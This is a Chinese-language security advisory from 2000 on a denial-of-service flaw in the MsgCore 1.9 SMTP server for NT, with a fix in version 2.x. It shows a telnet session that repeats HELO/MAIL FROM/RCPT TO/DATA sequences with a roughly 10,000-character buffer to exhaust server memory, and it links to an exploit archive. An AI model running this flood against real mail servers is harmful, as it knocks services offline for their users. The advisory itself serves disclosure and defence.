MsgCore/NT 拒绝服务漏洞
发布日期:2000-01-13
更新日期:2000-01-15
受影响系统:Nosque Workshop MsgCore 1.9
不受影响系统:Nosque Workshop MsgCore 2.10
描述:
Nosque Workshop MsgCore SMTP中存在拒绝服务漏洞。问题在于存储服务器输入的内存没有进行释放而最终造成资源耗尽,使NT目标主机需要重新启动。如果一个smtp客户端(或用户手工进行输入)在连接中发送多个"HELO/ MAIL FROM/ RCPT TO / DATA" 序列,分配于用来存储这些值的内存不能释放,一旦内存耗尽,目标主机就会停止运行。
例子:
[hellme@die-communitech.net$ telnet example.com 25
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220 MachineNamet AttackerIp with SMTP for NT BD0198
HELO CHEEF
250 Hello, AtackerHostName AttackerIp
mail to:<sssa.com>
250 <sssa.com@localhost> ok
rcpt to:<sssc.com>
250 to:<sssc.com> ok
Data
354 Send Mail Message Body; End with <CR><LF>.<CR><LF>
[buffer]
(point)
250 OK
如果反复执行这些命令,保存到服务器内存中的所有信息就有可能导致内存出错。
其中 [buffer] 为大约10000个字符。
相关资料:
开发商:http://www.web-net.com/supermail/
软件包:http://shareit1.element5.com/programs.html?nr=100364
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.securityfocus.com/data/vulnerabilities/exploits/diesmtp.zip
建议:
MsgCore在2.X版已经修复了这个漏洞:
http://www.web-net.com/supermail/
浏览次数:6651
严重程度:0(网友投票)